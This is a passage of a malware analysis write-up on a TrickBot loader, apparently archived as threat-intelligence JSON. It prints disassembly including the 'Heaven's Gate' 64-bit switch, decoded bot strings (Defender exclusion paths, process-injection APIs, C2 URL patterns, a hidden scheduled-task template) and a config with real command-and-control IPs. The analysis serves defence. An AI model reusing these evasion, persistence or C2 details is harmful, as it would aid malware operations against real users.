ECX,7\r\n01DB331C ^74 DF JE SHORT 01DB32FD\r\n01DB331E 83C1 05 ADD ECX,5\r\n01DB3321 66:8B06 MOV AX,WORD PTR DS:[ESI]\r\n01DB3324 83C6 02 ADD ESI,2\r\n01DB3327 8D97 00C0FFFF LEA EDX,DWORD PTR DS:[EDI+FFFFC000]\r\n01DB332D C1E8 02 SHR EAX,2\r\n01DB3330 74 2B JE SHORT 01DB335D\r\n01DB3332 29C2 SUB EDX,EAX\r\n01DB3334 ^E9 7AFFFFFF JMP 01DB32B3\r\n01DB3339 8D7426 00 LEA ESI,DWORD PTR DS:[ESI]\r\n01DB333D C1E8 02 SHR EAX,2\r\n01DB3340 8A1E MOV BL,BYTE PTR DS:[ESI]\r\n01DB3342 8D57 FF LEA EDX,DWORD PTR DS:[EDI-1]\r\n01DB3345 8D0498 LEA EAX,DWORD PTR DS:[EAX+EBX*4]\r\n01DB3348 46 INC ESI\r\n01DB3349 29C2 SUB EDX,EAX\r\n01DB334B 8A02 MOV AL,BYTE PTR DS:[EDX]\r\n01DB334D 8807 MOV BYTE PTR DS:[EDI],AL\r\n01DB334F 8A5A 01 MOV BL,BYTE PTR DS:[EDX+1]\r\n01DB3352 885F 01 MOV BYTE PTR DS:[EDI+1],BL\r\n01DB3355 83C7 02 ADD EDI,2\r\n01DB3358 ^E9 6EFFFFFF JMP 01DB32CB\r\n01DB335D 83F9 06 CMP ECX,6\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 11 of 21\n\n01DB3360 0F95C0 SETNE AL\r\n01DB3363 8B5424 28 MOV EDX,DWORD PTR SS:[ESP+28]\r\n01DB3367 035424 2C ADD EDX,DWORD PTR SS:[ESP+2C]\r\n01DB336B 39D6 CMP ESI,EDX\r\n01DB336D 77 26 JA SHORT 01DB3395\r\n01DB336F 72 1D JB SHORT 01DB338E\r\n01DB3371 2B7C24 30 SUB EDI,DWORD PTR SS:[ESP+30]\r\n01DB3375 8B5424 34 MOV EDX,DWORD PTR SS:[ESP+34]\r\n01DB3379 893A MOV DWORD PTR DS:[EDX],EDI\r\n01DB337B F7D8 NEG EAX\r\n01DB337D 83C4 0C ADD ESP,0C\r\n01DB3380 5A POP EDX\r\n01DB3381 59 POP ECX\r\n01DB3382 5B POP EBX\r\n01DB3383 5E POP ESI\r\n01DB3384 5F POP EDI\r\n01DB3385 5D POP EBP\r\n01DB3386 C3 RETN\r\n01DB3387 B8 01000000 MOV EAX,1\r\n01DB338C ^EB E3 JMP SHORT 01DB3371\r\n01DB338E B8 08000000 MOV EAX,8\r\n01DB3393 ^EB DC JMP SHORT 01DB3371\r\n01DB3395 B8 04000000 MOV EAX,4\r\n01DB339A ^EB D5 JMP SHORT 01DB3371\r\nIf running in WOW64 then another smaller 64 bit EXE is decoded and mapped into memory at 0x100000 and then\r\nsome hardcoded data is mapped into an executable region of memory which will kick off loading the bot into a new\r\nprocess. Before it gets there however it performs a little trick where it does a far jump into 64 bit code, what happens at\r\nthe call instruction is completely dependent on which debugger you are using. This technique is commonly refered to as\r\n‘Heavens Gate’ with a far call to 0x33:addr which switches the execution over to 64 bit because we are running in\r\nWOW64[3,4].\r\n00470000 55 PUSH EBP\r\n00470001 89E5 MOV EBP,ESP\r\n00470003 83E4 F0 AND ESP,FFFFFFF0\r\n00470006 9A 11004700 3300 CALL FAR 0033:00470011 ; Far call\r\n0047000D 89EC MOV ESP,EBP\r\n0047000F 5D POP EBP\r\n00470010 C3 RETN\r\n00470011 48 DEC EAX\r\n00470012 83EC 20 SUB ESP,20\r\n00470015 E8 061AB90F CALL 10001A20\r\n0047001A 48 DEC EAX\r\n0047001B 83C4 20 ADD ESP,20\r\n0047001E CB RETF ; Far return\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 12 of 21\n\nDecoded bot EXE that is injected has the same string encoding as the loader layer did so this decoded EXE is the\r\nTrickBot the previous layer is probably TrickLoader but it’s been changed to be position independent bytecode with\r\nfunction obfuscation to hide itself and further protect the bot EXE.\r\nDecoded bot strings:\r\nUnloadUserProfile\r\nLoadUserProfileW\r\nDestroyEnvironmentBlock\r\nCreateEnvironmentBlock\r\nUSERENV.dll\r\nGetAdaptersInfo\r\nIPHLPAPI.dll\r\nNtQueryInformationProcess\r\nntdll.dll\r\nPathFindExtensionW\r\nPathRemoveFileSpecW\r\nPathRemoveBackslashW\r\nStrStrIW\r\nPathRenameExtensionW\r\nPathAddBackslashW\r\nPathFindFileNameW\r\nSHLWAPI.dll\r\nCryptBinaryToStringW\r\nCryptStringToBinaryW\r\nCRYPT32.dll\r\nCoUninitialize\r\nCoCreateInstance\r\nole32.dll\r\nSetSecurityDescriptorDacl\r\nInitializeSecurityDescriptor\r\nCopySid\r\nGetLengthSid\r\nSetEntriesInAclW\r\nGetSecurityInfo\r\nSetSecurityInfo\r\nSetNamedSecurityInfoW\r\nRegSetValueExW\r\nRegOpenKeyExW\r\nRegCloseKey\r\nRegCreateKeyExW\r\nRevertToSelf\r\nAdjustTokenPrivileges\r\nLookupPrivilegeValueW\r\nCryptGetHashParam\r\nCryptAcquireContextW\r\nCryptSetKeyParam\r\nCryptReleaseContext\r\nConvertStringSecurityDescriptorToSecurityDescriptorW\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 13 of 21\n\nCryptImportKey\r\nCryptCreateHash\r\nCryptDecrypt\r\nCryptDestroyHash\r\nCryptHashData\r\nCryptDestroyKey\r\nAllocateAndInitializeSid\r\nFreeSid\r\nOpenProcessToken\r\nEqualSid\r\nCreateProcessAsUserW\r\nDuplicateTokenEx\r\nLookupAccountSidW\r\nGetTokenInformation\r\nGetUserNameW\r\nADVAPI32.dll\r\nCreateToolhelp32Snapshot\r\nProcess32NextW\r\nProcess32FirstW\r\nMultiByteToWideChar\r\nWideCharToMultiByte\r\nGetModuleHandleA\r\nQueryPerformanceCounter\r\nGetCurrentThreadId\r\nSetUnhandledExceptionFilter\r\nUnhandledExceptionFilter\r\nlstrlenA\r\nGetCurrentProcessId\r\nGetSystemTimeAsFileTime\r\nGetCurrentProcess\r\nGetVersionExW\r\nGetVersion\r\nSetFilePointer\r\nWriteFile\r\nReadFile\r\nCreateFileW\r\nlstrcmpiW\r\nGetTempFileNameW\r\nCreateProcessW\r\nMoveFileExW\r\nGetTickCount\r\nInitializeCriticalSectionAndSpinCount\r\nSleep\r\nGetFileAttributesW\r\nGetModuleFileNameW\r\nGetStartupInfoW\r\nGetTempPathW\r\nMoveFileW\r\nSetCurrentDirectoryW\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 14 of 21\n\nDeleteFileW\r\nlstrcpyW\r\nLocalFree\r\nCreateMutexW\r\nResumeThread\r\nWriteProcessMemory\r\nDuplicateHandle\r\nCreateEventW\r\nGetExitCodeThread\r\nVirtualAllocEx\r\nVirtualProtectEx\r\nTerminateProcess\r\nReadProcessMemory\r\nVirtualFreeEx\r\nOpenProcess\r\nCreateRemoteThread\r\nSetEvent\r\nCreateDirectoryW\r\nSetFileAttributesW\r\nlstrcmpA\r\nLoadLibraryA\r\nGetFileTime\r\nFindNextFileW\r\nGetSystemInfo\r\nLockResource\r\nFindClose\r\nGetLastError\r\nlstrcpynW\r\nSetFileTime\r\nGetModuleHandleW\r\nLoadResource\r\nFreeLibrary\r\nFindResourceW\r\nFindFirstFileW\r\nGetFullPathNameW\r\nlstrlenW\r\nlstrcmpW\r\nGetComputerNameW\r\nCreateThread\r\nDEBG\r\nMACHINE\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Paths\r\nMACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths\r\nMACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\r\nWinDefend\r\n%08lX%04lX%lu\r\n working\r\npath\r\nlastver\r\nModuleQuery\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 15 of 21\n\nLeaveCriticalSection\r\nEnterCriticalSection\r\nInitializeCriticalSection\r\nVERS\r\nSignatureLength\r\nECCPUBLICBLOB\r\nECDSA_P384\r\nspam.dnsbl.sorbs.net\r\ndnsbl-1.uceprotect.net\r\nb.barracudacentral.org\r\ncbl.abuseat.org\r\nzen.spamhaus.org\r\nGetNativeSystemInfo\r\nModule is not valid\r\nclient_id\r\n1032\r\n/plain/clientip\r\n/text\r\n/raw\r\n/plain\r\nip.anysrc.net\r\nwtfismyip.com\r\nmyexternalip.com\r\nicanhazip.com\r\napi.ipify.org\r\nipinfo.io\r\nipecho.net\r\ncheckip.amazonaws.com\r\nssert\r\nD:(A;;GA;;;WD)(A;;GA;;;BA)(A;;GA;;;SY)(A;;GA;;;RC)\r\nGlobal\\Muta\r\n--%s--\r\n--%s\r\nContent-Disposition: form-data; name=\"%S\"\r\nContent-Type: multipart/form-data; boundary=%s\r\nContent-Length: %d\r\n------Boundary%08X\r\nwinsta0\\default\r\nWTSQueryUserToken\r\nWTSGetActiveConsoleSessionId\r\nWTSFreeMemory\r\nWTSEnumerateSessionsA\r\nwtsapi32\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 16 of 21\n\nGetProcAddress\r\nLoadLibraryW\r\nExitProcess\r\nResetEvent\r\nCloseHandle\r\nWaitForSingleObject\r\nSignalObjectAndWait\r\nsvchost.exe\r\nRelease\r\nFreeBuffer\r\nControl\r\nStart\r\nLoad to M failed\r\nRun D failed\r\nLoad to P failed\r\nFind P failed\r\nCreate ZP failed\r\nModule has already been loaded\r\nparentfiles\r\nperiod\r\nfile\r\nconf\r\ncontrol\r\nneedinfo\r\nautocontrol\r\nautoconf\r\nprocessname\r\nautostart\r\n\u003cmoduleconfig\u003e*\u003c/moduleconfig\u003e\r\n%s%s\r\n%s%s_configs\\\r\nModules\\\r\nHeapReAlloc\r\nHeapFree\r\nGetProcessHeap\r\nHeapAlloc\r\nkernel32.dll\r\n0.0.0.0\r\nPOST\r\nInternetCanonicalizeUrlW\r\nWininet\r\nBCryptDestroyKey\r\nBCryptCloseAlgorithmProvider\r\nBCryptVerifySignature\r\nBCryptGetProperty\r\nBCryptImportKeyPair\r\nBCryptOpenAlgorithmProvider\r\nNCryptFreeObject\r\nNCryptDeleteKey\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 17 of 21\n\nNCryptImportKey\r\nNCryptOpenStorageProvider\r\nBcrypt.dll\r\nNcrypt.dll\r\n%s %s SP%d\r\nUnknown\r\nWindows 2000\r\nWindows XP\r\nWindows Server 2003\r\nWindows Vista\r\nWindows Server 2008\r\nWindows 7\r\nWindows Server 2008 R2\r\nWindows 8\r\nWindows Server 2012\r\nWindows 8.1\r\nWindows Server 2012 R2\r\nWindows 10\r\nWindows 10 Server\r\nMozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0\r\npsrv\r\nplugins\r\nexpir\r\nservconf\r\n%s_W%d%d%d.\r\nModule already unloaded\r\nControl failed\r\nModule was unloaded\r\nProcess has been finished\r\nrelease\r\nStart failed\r\nProcess was unloaded\r\nGetParentInfo error\r\nUnable to load module from server\r\nstart\r\nDecode from BASE64 error\r\nWin32 error\r\nInvalid params count\r\nNo params\r\ninfo\r\ndata\r\n%s/%s/64/%s/%s/%s/\r\nnoname\r\n%s/%s/63/%s/%s/%s/%s/\r\n/%s/%s/25/%s/\r\n/%s/%s/23/%d/\r\n/%s/%s/14/%s/%s/0/\r\n/%s/%s/10/%s/%s/%d/\r\n/%s/%s/5/%s/\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 18 of 21\n\n/%s/%s/1/%s/\r\n/%s/%s/0/%s/%s/%s/%s/%s/\r\nname\r\nmodule\r\nMsNetMonitor\r\n%s.%s.%s.%s\r\n%s.%s\r\n%Y-%m-%dT%H:%M:%S\r\n\u003c/UserId\u003e\r\n\u003cUserId\u003e\r\n\u003cLogonType\u003eInteractiveToken\u003c/LogonType\u003e\r\n\u003cRunLevel\u003eLeastPrivilege\u003c/RunLevel\u003e\r\n\u003cRunLevel\u003eHighestAvailable\u003c/RunLevel\u003e\r\n\u003cGroupId\u003eNT AUTHORITY\\SYSTEM\u003c/GroupId\u003e\r\n\u003cLogonType\u003eInteractiveToken\u003c/LogonType\u003e\r\n\u003c/LogonTrigger\u003e\r\n\u003cLogonTrigger\u003e\r\n\u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n\u003c/Command\u003e\r\n\u003c/Exec\u003e\r\n\u003c/Actions\u003e\r\n\u003c/Task\u003e\r\n\u003c/Principal\u003e\r\n\u003c/Principals\u003e\r\n\u003cSettings\u003e\r\n\u003cMultipleInstancesPolicy\u003eIgnoreNew\u003c/MultipleInstancesPolicy\u003e\r\n\u003cDisallowStartIfOnBatteries\u003efalse\u003c/DisallowStartIfOnBatteries\u003e\r\n\u003cStopIfGoingOnBatteries\u003efalse\u003c/StopIfGoingOnBatteries\u003e\r\n\u003cAllowHardTerminate\u003efalse\u003c/AllowHardTerminate\u003e\r\n\u003cStartWhenAvailable\u003etrue\u003c/StartWhenAvailable\u003e\r\n\u003cRunOnlyIfNetworkAvailable\u003efalse\u003c/RunOnlyIfNetworkAvailable\u003e\r\n\u003cIdleSettings\u003e\r\n\u003cStopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\r\n\u003cRestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\r\n\u003c/IdleSettings\u003e\r\n\u003cAllowStartOnDemand\u003etrue\u003c/AllowStartOnDemand\u003e\r\n\u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n\u003cHidden\u003etrue\u003c/Hidden\u003e\r\n\u003cRunOnlyIfIdle\u003efalse\u003c/RunOnlyIfIdle\u003e\r\n\u003cWakeToRun\u003efalse\u003c/WakeToRun\u003e\r\n\u003cExecutionTimeLimit\u003ePT0S\u003c/ExecutionTimeLimit\u003e\r\n\u003cPriority\u003e7\u003c/Priority\u003e\r\n\u003c/Settings\u003e\r\n\u003cActions Context=\"Author\"\u003e?�����ps�������pp?\u003c/StartBoundary\u003e\r\n\u003cEnabled\u003etrue\u003c/Enabled\u003e\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 19 of 21\n\n\u003cScheduleByDay\u003e\r\n\u003cDaysInterval\u003e1\u003c/DaysInterval\u003e\r\n\u003c/ScheduleByDay\u003e\r\n\u003c/CalendarTrigger\u003e\r\n\u003c/Triggers\u003e\r\n\u003cPrincipals\u003e\r\n\u003cPrincipal id=\"Author\"\u003e\r\n\u003cCalendarTrigger\u003e\r\n\u003cRepetition\u003e\r\n\u003cInterval\u003ePT3M\u003c/Interval\u003e\r\n\u003cDuration\u003eP1D\u003c/Duration\u003e\r\n\u003cStopAtDurationEnd\u003efalse\u003c/StopAtDurationEnd\u003e\r\n\u003c/Repetition\u003e\r\n\u003cStartBoundary\u003e\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-16\"?\u003e\r\n\u003cTask version=\"1.2\"\r\nxmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\"\u003e\r\n\u003cRegistrationInfo\u003e\r\n\u003cVersion\u003e1.0.1\u003c/Version\u003e\r\n\u003cDescription\u003eSystem service monitor.\u003c/Description\u003e\r\n\u003cURI\u003e\\Task\u003c/URI\u003e\r\n\u003c/RegistrationInfo\u003e\r\n\u003cTriggers\u003e\r\nSYSTEM\r\n%s sTart\r\ngroup_tag\r\nCONFIG\r\nuser\r\nconfig.conf\r\n.tmp\r\n%s %s\r\nSINJ\r\nnot listed\r\nlisted\r\nDNSBL\r\nclient is not behind NAT\r\nclient is behind NAT\r\nfailed\r\nNAT status\r\npublic.bin\r\nConfigsAndKeys\\\r\nDecoding the config out of the bot EXE hasn’t changed.\r\nInitial bot config:\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 20 of 21\n\n\u003cmcconf\u003e\u003cver\u003e1000158\u003c/ver\u003e\u003cgtag\u003eser0328\u003c/gtag\u003e\u003cservs\u003e\u003csrv\u003e109.95.113.130:449\u003c/srv\u003e\u003csrv\u003e87.101.70.109:449\u003c/srv\u003e\u003csrv\u003e3\r\nReferences:\r\n1. https://labsblog.f-secure.com/2017/12/18/dont-let-an-auto-elevating-bot-spoil-your-christmas/\r\n2. http://www.kernelmode.info/forum/viewtopic.php?f=16\u0026t=4869\u0026p=31078\u0026hilit=icedid#p31078\r\n3. http://www.hexacorn.com/blog/2015/10/26/heavens-gate-and-a-chameleon-code-x8664/\r\n4. https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/\r\n5. https://github.com/hfiref0x/UACME/blob/143ead4db6b57a84478c9883023fbe5d64ac277b/Source/Akagi/sup.c#L77\r\nSource: https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 21 of 21",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html"
	],
	"report_names": [
		"trickbot-uacme.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434000,
	"ts_updated_at": 1775826685,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b468dd20dba589ca35827d289ab739b29a629f18.pdf",
		"text": "https://archive.orkl.eu/b468dd20dba589ca35827d289ab739b29a629f18.txt",
		"img": "https://archive.orkl.eu/b468dd20dba589ca35827d289ab739b29a629f18.jpg"
	}
}